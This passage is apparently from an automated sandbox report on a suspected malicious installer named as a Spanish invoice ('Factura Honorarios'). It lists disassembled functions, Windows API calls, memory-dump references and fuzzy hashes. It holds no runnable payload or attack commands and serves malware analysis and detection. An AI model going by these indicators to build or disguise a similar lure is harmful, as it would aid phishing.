                                                                                                                                  • Instruction Fuzzy Hash: 14011A72D00619DADF009FA4C9447EFBBB4EF14355F00843AD945B6281DB789658CFE9
                                                                                                                                  Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(?,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                  • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                                                                  • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                                                                                                                  • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                                                                  • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                                                                                                                  Function 00405260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0040528F
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                                                                                    • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                  • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                                                                  • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                                                                                                                  • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                                                                  • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                                                                                                                  Function 00405DA9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405DC7
                                                                                                                                  • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,00403357,00437000,00437800,00437800,00437800,00437800,00437800,75573420,004035A3), ref: 00405DE2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                  • String ID: nsa
                                                                                                                                  • API String ID: 1716503409-2209301699
                                                                                                                                  • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                  • Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
                                                                                                                                  • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                  • Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64
                                                                                                                                  Function 0040586D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                                                                                  Strings
                                                                                                                                  • Error launching installer, xrefs: 00405880
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                  • String ID: Error launching installer
                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                  • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                                                  • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                                                                                                  • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                                                  • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                                                                                                  Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                                                                  • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                                                                                                                  • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                                                                  • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                                                                                                                  Function 00406FC4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                                                                  • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
                                                                                                                                  • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                                                                  • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                                                                                                                  Function 00406CDA Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                                                                  • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                                                                                                                  • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                                                                  • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                                                                                                                  Function 004067DF Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                                                                  • Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
                                                                                                                                  • Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                                                                  • Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55
                                                                                                                                  Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                                                  • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                                                                                                                  • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                                                  • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                                                                                                                  Function 00406D4B Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                                                  • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                                                                                                                  • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                                                  • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45
                                                                                                                                  Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                                                                                  • Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
                                                                                                                                  • Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                                                                                  • Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45
                                                                                                                                  Function 00405CDF Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                  • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                  • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                                                                                                                  • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                  • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98